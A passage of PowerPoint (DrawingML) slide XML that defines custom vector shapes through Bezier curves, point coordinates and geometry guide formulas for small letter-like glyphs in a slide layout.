                        <a:pt x="8" y="6"/>
                        <a:pt x="7" y="8"/>
                        <a:pt x="5" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="12"/>
                        <a:pt x="4" y="14"/>
                        <a:pt x="4" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="19"/>
                        <a:pt x="4" y="21"/>
                        <a:pt x="5" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="25"/>
                        <a:pt x="8" y="27"/>
                        <a:pt x="11" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="29"/>
                        <a:pt x="15" y="30"/>
                        <a:pt x="18" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="30"/>
                        <a:pt x="23" y="29"/>
                        <a:pt x="26" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="25"/>
                        <a:pt x="29" y="23"/>
                        <a:pt x="30" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="20"/>
                        <a:pt x="20" y="20"/>
                        <a:pt x="20" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="17"/>
                        <a:pt x="20" y="17"/>
                        <a:pt x="20" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="33" y="17"/>
                        <a:pt x="33" y="17"/>
                        <a:pt x="33" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="33" y="22"/>
                        <a:pt x="32" y="26"/>
                        <a:pt x="29" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="26" y="31"/>
                        <a:pt x="22" y="33"/>
                        <a:pt x="18" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="33"/>
                        <a:pt x="7" y="31"/>
                        <a:pt x="4" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="24"/>
                        <a:pt x="0" y="20"/>
                        <a:pt x="0" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="14"/>
                        <a:pt x="1" y="11"/>
                        <a:pt x="3" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="6"/>
                        <a:pt x="6" y="4"/>
                        <a:pt x="9" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="1"/>
                        <a:pt x="14" y="0"/>
                        <a:pt x="17" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="0"/>
                        <a:pt x="22" y="1"/>
                        <a:pt x="24" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="3"/>
                        <a:pt x="29" y="4"/>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344"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10317163" y="4405313"/>
                  <a:ext cx="41275" cy="76200"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 18"/>
                    <a:gd name="T1" fmla="*/ 26 h 33"/>
                    <a:gd name="T2" fmla="*/ 2 w 18"/>
                    <a:gd name="T3" fmla="*/ 25 h 33"/>
                    <a:gd name="T4" fmla="*/ 9 w 18"/>
                    <a:gd name="T5" fmla="*/ 30 h 33"/>
                    <a:gd name="T6" fmla="*/ 11 w 18"/>
                    <a:gd name="T7" fmla="*/ 29 h 33"/>
                    <a:gd name="T8" fmla="*/ 14 w 18"/>
                    <a:gd name="T9" fmla="*/ 27 h 33"/>
                    <a:gd name="T10" fmla="*/ 14 w 18"/>
                    <a:gd name="T11" fmla="*/ 24 h 33"/>
                    <a:gd name="T12" fmla="*/ 13 w 18"/>
                    <a:gd name="T13" fmla="*/ 21 h 33"/>
                    <a:gd name="T14" fmla="*/ 8 w 18"/>
                    <a:gd name="T15" fmla="*/ 16 h 33"/>
                    <a:gd name="T16" fmla="*/ 3 w 18"/>
                    <a:gd name="T17" fmla="*/ 12 h 33"/>
                    <a:gd name="T18" fmla="*/ 2 w 18"/>
                    <a:gd name="T19" fmla="*/ 8 h 33"/>
                    <a:gd name="T20" fmla="*/ 3 w 18"/>
                    <a:gd name="T21" fmla="*/ 4 h 33"/>
                    <a:gd name="T22" fmla="*/ 5 w 18"/>
                    <a:gd name="T23" fmla="*/ 1 h 33"/>
                    <a:gd name="T24" fmla="*/ 9 w 18"/>
                    <a:gd name="T25" fmla="*/ 0 h 33"/>
                    <a:gd name="T26" fmla="*/ 13 w 18"/>
                    <a:gd name="T27" fmla="*/ 2 h 33"/>
                    <a:gd name="T28" fmla="*/ 17 w 18"/>
                    <a:gd name="T29" fmla="*/ 5 h 33"/>
                    <a:gd name="T30" fmla="*/ 15 w 18"/>
                    <a:gd name="T31" fmla="*/ 7 h 33"/>
                    <a:gd name="T32" fmla="*/ 12 w 18"/>
                    <a:gd name="T33" fmla="*/ 4 h 33"/>
                    <a:gd name="T34" fmla="*/ 9 w 18"/>
                    <a:gd name="T35" fmla="*/ 4 h 33"/>
                    <a:gd name="T36" fmla="*/ 6 w 18"/>
                    <a:gd name="T37" fmla="*/ 5 h 33"/>
                    <a:gd name="T38" fmla="*/ 5 w 18"/>
                    <a:gd name="T39" fmla="*/ 7 h 33"/>
                    <a:gd name="T40" fmla="*/ 5 w 18"/>
                    <a:gd name="T41" fmla="*/ 9 h 33"/>
                    <a:gd name="T42" fmla="*/ 7 w 18"/>
                    <a:gd name="T43" fmla="*/ 11 h 33"/>
                    <a:gd name="T44" fmla="*/ 11 w 18"/>
                    <a:gd name="T45" fmla="*/ 15 h 33"/>
                    <a:gd name="T46" fmla="*/ 16 w 18"/>
                    <a:gd name="T47" fmla="*/ 20 h 33"/>
                    <a:gd name="T48" fmla="*/ 18 w 18"/>
                    <a:gd name="T49" fmla="*/ 24 h 33"/>
                    <a:gd name="T50" fmla="*/ 15 w 18"/>
                    <a:gd name="T51" fmla="*/ 30 h 33"/>
                    <a:gd name="T52" fmla="*/ 9 w 18"/>
                    <a:gd name="T53" fmla="*/ 33 h 33"/>
                    <a:gd name="T54" fmla="*/ 4 w 18"/>
                    <a:gd name="T55" fmla="*/ 31 h 33"/>
                    <a:gd name="T56" fmla="*/ 0 w 18"/>
                    <a:gd name="T57" fmla="*/ 2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33">
                      <a:moveTo>
                        <a:pt x="0" y="26"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="25"/>
                        <a:pt x="2" y="25"/>
                        <a:pt x="2" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="28"/>
                        <a:pt x="6" y="30"/>
                        <a:pt x="9" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="30"/>
                        <a:pt x="11" y="29"/>
                        <a:pt x="11" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="28"/>
                        <a:pt x="13" y="28"/>
                        <a:pt x="14" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="26"/>
                        <a:pt x="14" y="25"/>
                        <a:pt x="14" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="23"/>
                        <a:pt x="14" y="22"/>
                        <a:pt x="13" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="20"/>
                        <a:pt x="10" y="18"/>
                        <a:pt x="8" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="15"/>
                        <a:pt x="4" y="13"/>
                        <a:pt x="3" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="11"/>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="6"/>
                        <a:pt x="2" y="5"/>
                        <a:pt x="3" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="3"/>
                        <a:pt x="4" y="2"/>
                        <a:pt x="5" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="1"/>
                        <a:pt x="8" y="0"/>
                        <a:pt x="9" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="0"/>
                        <a:pt x="12" y="1"/>
                        <a:pt x="13" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="2"/>
                        <a:pt x="16" y="4"/>
                        <a:pt x="17" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="7"/>
                        <a:pt x="15" y="7"/>
                        <a:pt x="15" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="6"/>
                        <a:pt x="12" y="5"/>
                        <a:pt x="12" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="4"/>
                        <a:pt x="10" y="4"/>
                        <a:pt x="9" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="4"/>
                        <a:pt x="7" y="4"/>
                        <a:pt x="6" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="5"/>
                        <a:pt x="5" y="6"/>
                        <a:pt x="5" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="8"/>
                        <a:pt x="5" y="9"/>
                        <a:pt x="5" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="10"/>
                        <a:pt x="6" y="11"/>
                        <a:pt x="7" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="12"/>
                        <a:pt x="8" y="13"/>
                        <a:pt x="11" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="16"/>
                        <a:pt x="15" y="18"/>
                        <a:pt x="16" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="21"/>
                        <a:pt x="18" y="23"/>
                        <a:pt x="18" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="27"/>
                        <a:pt x="17" y="28"/>
                        <a:pt x="15" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="32"/>
                        <a:pt x="11" y="33"/>
                        <a:pt x="9" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="33"/>
                        <a:pt x="5" y="32"/>
                        <a:pt x="4" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="30"/>
                        <a:pt x="1" y="28"/>
                        <a:pt x="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Rectangle 345"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10469563" y="4441826"/>
                  <a:ext cx="352425"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Rectangle 346"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9894888" y="4498976"/>
                  <a:ext cx="539750"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347"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10412413" y="4441826"/>
                  <a:ext cx="57150" cy="66675"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 14 w 36"/>
                    <a:gd name="T1" fmla="*/ 42 h 42"/>
                    <a:gd name="T2" fmla="*/ 36 w 36"/>
                    <a:gd name="T3" fmla="*/ 22 h 42"/>
                    <a:gd name="T4" fmla="*/ 36 w 36"/>
                    <a:gd name="T5" fmla="*/ 0 h 42"/>
                    <a:gd name="T6" fmla="*/ 0 w 36"/>
                    <a:gd name="T7" fmla="*/ 36 h 42"/>
                    <a:gd name="T8" fmla="*/ 14 w 36"/>
                    <a:gd name="T9" fmla="*/ 42 h 42"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="36" h="42">
                      <a:moveTo>
                        <a:pt x="14" y="42"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="36" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="36" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="36"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1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348"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8650288" y="4240213"/>
                  <a:ext cx="31750" cy="31750"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 14 w 14"/>
                    <a:gd name="T1" fmla="*/ 3 h 14"/>
                    <a:gd name="T2" fmla="*/ 12 w 14"/>
                    <a:gd name="T3" fmla="*/ 4 h 14"/>
                    <a:gd name="T4" fmla="*/ 8 w 14"/>
                    <a:gd name="T5" fmla="*/ 2 h 14"/>
                    <a:gd name="T6" fmla="*/ 4 w 14"/>
                    <a:gd name="T7" fmla="*/ 3 h 14"/>
                    <a:gd name="T8" fmla="*/ 2 w 14"/>
                    <a:gd name="T9" fmla="*/ 7 h 14"/>
                    <a:gd name="T10" fmla="*/ 3 w 14"/>
                    <a:gd name="T11" fmla="*/ 10 h 14"/>
                    <a:gd name="T12" fmla="*/ 5 w 14"/>
                    <a:gd name="T13" fmla="*/ 12 h 14"/>
                    <a:gd name="T14" fmla="*/ 8 w 14"/>
                    <a:gd name="T15" fmla="*/ 12 h 14"/>
                    <a:gd name="T16" fmla="*/ 12 w 14"/>
                    <a:gd name="T17" fmla="*/ 10 h 14"/>
                    <a:gd name="T18" fmla="*/ 14 w 14"/>
                    <a:gd name="T19" fmla="*/ 11 h 14"/>
                    <a:gd name="T20" fmla="*/ 11 w 14"/>
                    <a:gd name="T21" fmla="*/ 13 h 14"/>
                    <a:gd name="T22" fmla="*/ 8 w 14"/>
                    <a:gd name="T23" fmla="*/ 14 h 14"/>
                    <a:gd name="T24" fmla="*/ 2 w 14"/>
                    <a:gd name="T25" fmla="*/ 12 h 14"/>
                    <a:gd name="T26" fmla="*/ 0 w 14"/>
                    <a:gd name="T27" fmla="*/ 7 h 14"/>
                    <a:gd name="T28" fmla="*/ 1 w 14"/>
                    <a:gd name="T29" fmla="*/ 4 h 14"/>
                    <a:gd name="T30" fmla="*/ 4 w 14"/>
                    <a:gd name="T31" fmla="*/ 1 h 14"/>
                    <a:gd name="T32" fmla="*/ 8 w 14"/>
                    <a:gd name="T33" fmla="*/ 0 h 14"/>
                    <a:gd name="T34" fmla="*/ 10 w 14"/>
                    <a:gd name="T35" fmla="*/ 0 h 14"/>
                    <a:gd name="T36" fmla="*/ 12 w 14"/>
                    <a:gd name="T37" fmla="*/ 1 h 14"/>
                    <a:gd name="T38" fmla="*/ 14 w 14"/>
                    <a:gd name="T39"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14" y="3"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="4"/>
                        <a:pt x="12" y="4"/>
                        <a:pt x="12" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="2"/>
                        <a:pt x="10" y="2"/>
                        <a:pt x="8" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="2"/>
                        <a:pt x="5" y="2"/>
                        <a:pt x="4" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="4"/>
                        <a:pt x="2" y="6"/>
                        <a:pt x="2" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="8"/>
                        <a:pt x="2" y="9"/>
                        <a:pt x="3" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="11"/>
                        <a:pt x="4" y="11"/>
                        <a:pt x="5" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="12"/>
                        <a:pt x="7" y="12"/>
                        <a:pt x="8" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="12"/>
                        <a:pt x="11" y="12"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="11"/>
                        <a:pt x="14" y="11"/>
                        <a:pt x="14" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="12"/>
                        <a:pt x="12" y="13"/>
                        <a:pt x="11" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="14"/>
                        <a:pt x="9" y="14"/>
                        <a:pt x="8" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="14"/>
                        <a:pt x="4" y="13"/>
                        <a:pt x="2" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="11"/>
                        <a:pt x="0" y="9"/>
                        <a:pt x="0" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="6"/>
                        <a:pt x="1" y="5"/>
                        <a:pt x="1" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="2"/>
                        <a:pt x="3" y="2"/>
                        <a:pt x="4" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="0"/>
                        <a:pt x="6" y="0"/>
                        <a:pt x="8" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="0"/>
                        <a:pt x="9" y="0"/>
                        <a:pt x="10" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="1"/>
                        <a:pt x="12" y="1"/>
                        <a:pt x="12" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="2"/>
                        <a:pt x="13" y="2"/>
                        <a:pt x="1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349"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8686800" y="4240213"/>
                  <a:ext cx="33338" cy="31750"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 7 w 14"/>
                    <a:gd name="T1" fmla="*/ 0 h 14"/>
                    <a:gd name="T2" fmla="*/ 12 w 14"/>
                    <a:gd name="T3" fmla="*/ 2 h 14"/>
                    <a:gd name="T4" fmla="*/ 14 w 14"/>
                    <a:gd name="T5" fmla="*/ 7 h 14"/>
                    <a:gd name="T6" fmla="*/ 12 w 14"/>
                    <a:gd name="T7" fmla="*/ 12 h 14"/>
                    <a:gd name="T8" fmla="*/ 7 w 14"/>
                    <a:gd name="T9" fmla="*/ 14 h 14"/>
                    <a:gd name="T10" fmla="*/ 2 w 14"/>
                    <a:gd name="T11" fmla="*/ 12 h 14"/>
                    <a:gd name="T12" fmla="*/ 0 w 14"/>
                    <a:gd name="T13" fmla="*/ 7 h 14"/>
                    <a:gd name="T14" fmla="*/ 2 w 14"/>
                    <a:gd name="T15" fmla="*/ 2 h 14"/>
                    <a:gd name="T16" fmla="*/ 7 w 14"/>
                    <a:gd name="T17" fmla="*/ 0 h 14"/>
                    <a:gd name="T18" fmla="*/ 7 w 14"/>
                    <a:gd name="T19" fmla="*/ 2 h 14"/>
                    <a:gd name="T20" fmla="*/ 4 w 14"/>
                    <a:gd name="T21" fmla="*/ 3 h 14"/>
                    <a:gd name="T22" fmla="*/ 2 w 14"/>
                    <a:gd name="T23" fmla="*/ 7 h 14"/>
                    <a:gd name="T24" fmla="*/ 3 w 14"/>
                    <a:gd name="T25" fmla="*/ 10 h 14"/>
                    <a:gd name="T26" fmla="*/ 5 w 14"/>
                    <a:gd name="T27" fmla="*/ 12 h 14"/>
                    <a:gd name="T28" fmla="*/ 7 w 14"/>
                    <a:gd name="T29" fmla="*/ 12 h 14"/>
                    <a:gd name="T30" fmla="*/ 10 w 14"/>
                    <a:gd name="T31" fmla="*/ 12 h 14"/>
                    <a:gd name="T32" fmla="*/ 12 w 14"/>
                    <a:gd name="T33" fmla="*/ 10 h 14"/>
                    <a:gd name="T34" fmla="*/ 13 w 14"/>
                    <a:gd name="T35" fmla="*/ 7 h 14"/>
                    <a:gd name="T36" fmla="*/ 11 w 14"/>
                    <a:gd name="T37" fmla="*/ 3 h 14"/>
                    <a:gd name="T38" fmla="*/ 7 w 14"/>
                    <a:gd name="T39"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7" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="0"/>
                        <a:pt x="11" y="1"/>
                        <a:pt x="12" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="4"/>
                        <a:pt x="14" y="5"/>
                        <a:pt x="14" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="9"/>
                        <a:pt x="14" y="11"/>
                        <a:pt x="12" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="13"/>
                        <a:pt x="9" y="14"/>
                        <a:pt x="7" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="14"/>
                        <a:pt x="4" y="13"/>
                        <a:pt x="2" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="11"/>
                        <a:pt x="0" y="9"/>
                        <a:pt x="0" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="5"/>
                        <a:pt x="1" y="4"/>
                        <a:pt x="2" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="1"/>
                        <a:pt x="5" y="0"/>
                        <a:pt x="7" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="7" y="2"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="2"/>
                        <a:pt x="5" y="2"/>
                        <a:pt x="4" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="4"/>
                        <a:pt x="2" y="6"/>
                        <a:pt x="2" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="8"/>
                        <a:pt x="2" y="9"/>
                        <a:pt x="3" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="11"/>
                        <a:pt x="4" y="11"/>
                        <a:pt x="5" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="12"/>
                        <a:pt x="6" y="12"/>
                        <a:pt x="7" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="12"/>
                        <a:pt x="9" y="12"/>
                        <a:pt x="10" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="11"/>
                        <a:pt x="11" y="11"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="9"/>
                        <a:pt x="13" y="8"/>
                        <a:pt x="13" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="6"/>
                        <a:pt x="12" y="4"/>
                        <a:pt x="11" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="2"/>
                        <a:pt x="9" y="2"/>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0"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8726488" y="4240213"/>
                  <a:ext cx="46038" cy="31750"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 20"/>
                    <a:gd name="T1" fmla="*/ 0 h 14"/>
                    <a:gd name="T2" fmla="*/ 2 w 20"/>
                    <a:gd name="T3" fmla="*/ 0 h 14"/>
                    <a:gd name="T4" fmla="*/ 2 w 20"/>
                    <a:gd name="T5" fmla="*/ 3 h 14"/>
                    <a:gd name="T6" fmla="*/ 4 w 20"/>
                    <a:gd name="T7" fmla="*/ 1 h 14"/>
                    <a:gd name="T8" fmla="*/ 7 w 20"/>
                    <a:gd name="T9" fmla="*/ 0 h 14"/>
                    <a:gd name="T10" fmla="*/ 9 w 20"/>
                    <a:gd name="T11" fmla="*/ 0 h 14"/>
                    <a:gd name="T12" fmla="*/ 10 w 20"/>
                    <a:gd name="T13" fmla="*/ 1 h 14"/>
                    <a:gd name="T14" fmla="*/ 11 w 20"/>
                    <a:gd name="T15" fmla="*/ 3 h 14"/>
                    <a:gd name="T16" fmla="*/ 13 w 20"/>
                    <a:gd name="T17" fmla="*/ 1 h 14"/>
                    <a:gd name="T18" fmla="*/ 16 w 20"/>
                    <a:gd name="T19" fmla="*/ 0 h 14"/>
                    <a:gd name="T20" fmla="*/ 18 w 20"/>
                    <a:gd name="T21" fmla="*/ 1 h 14"/>
                    <a:gd name="T22" fmla="*/ 20 w 20"/>
                    <a:gd name="T23" fmla="*/ 3 h 14"/>
                    <a:gd name="T24" fmla="*/ 20 w 20"/>
                    <a:gd name="T25" fmla="*/ 6 h 14"/>
                    <a:gd name="T26" fmla="*/ 20 w 20"/>
                    <a:gd name="T27" fmla="*/ 14 h 14"/>
                    <a:gd name="T28" fmla="*/ 19 w 20"/>
                    <a:gd name="T29" fmla="*/ 14 h 14"/>
                    <a:gd name="T30" fmla="*/ 19 w 20"/>
                    <a:gd name="T31" fmla="*/ 6 h 14"/>
                    <a:gd name="T32" fmla="*/ 18 w 20"/>
                    <a:gd name="T33" fmla="*/ 3 h 14"/>
                    <a:gd name="T34" fmla="*/ 17 w 20"/>
                    <a:gd name="T35" fmla="*/ 2 h 14"/>
                    <a:gd name="T36" fmla="*/ 16 w 20"/>
                    <a:gd name="T37" fmla="*/ 2 h 14"/>
                    <a:gd name="T38" fmla="*/ 13 w 20"/>
                    <a:gd name="T39" fmla="*/ 2 h 14"/>
                    <a:gd name="T40" fmla="*/ 12 w 20"/>
                    <a:gd name="T41" fmla="*/ 4 h 14"/>
                    <a:gd name="T42" fmla="*/ 11 w 20"/>
                    <a:gd name="T43" fmla="*/ 8 h 14"/>
                    <a:gd name="T44" fmla="*/ 11 w 20"/>
                    <a:gd name="T45" fmla="*/ 14 h 14"/>
                    <a:gd name="T46" fmla="*/ 10 w 20"/>
                    <a:gd name="T47" fmla="*/ 14 h 14"/>
                    <a:gd name="T48" fmla="*/ 10 w 20"/>
                    <a:gd name="T49" fmla="*/ 7 h 14"/>
                    <a:gd name="T50" fmla="*/ 9 w 20"/>
                    <a:gd name="T51" fmla="*/ 4 h 14"/>
                    <a:gd name="T52" fmla="*/ 8 w 20"/>
                    <a:gd name="T53" fmla="*/ 2 h 14"/>
                    <a:gd name="T54" fmla="*/ 6 w 20"/>
                    <a:gd name="T55" fmla="*/ 2 h 14"/>
                    <a:gd name="T56" fmla="*/ 4 w 20"/>
                    <a:gd name="T57" fmla="*/ 2 h 14"/>
                    <a:gd name="T58" fmla="*/ 3 w 20"/>
                    <a:gd name="T59" fmla="*/ 4 h 14"/>
                    <a:gd name="T60" fmla="*/ 2 w 20"/>
                    <a:gd name="T61" fmla="*/ 8 h 14"/>
                    <a:gd name="T62" fmla="*/ 2 w 20"/>
                    <a:gd name="T63" fmla="*/ 14 h 14"/>
                    <a:gd name="T64" fmla="*/ 0 w 20"/>
                    <a:gd name="T65" fmla="*/ 14 h 14"/>
                    <a:gd name="T66" fmla="*/ 0 w 20"/>
                    <a:gd name="T6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14">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="0"/>
                        <a:pt x="2" y="0"/>
                        <a:pt x="2" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
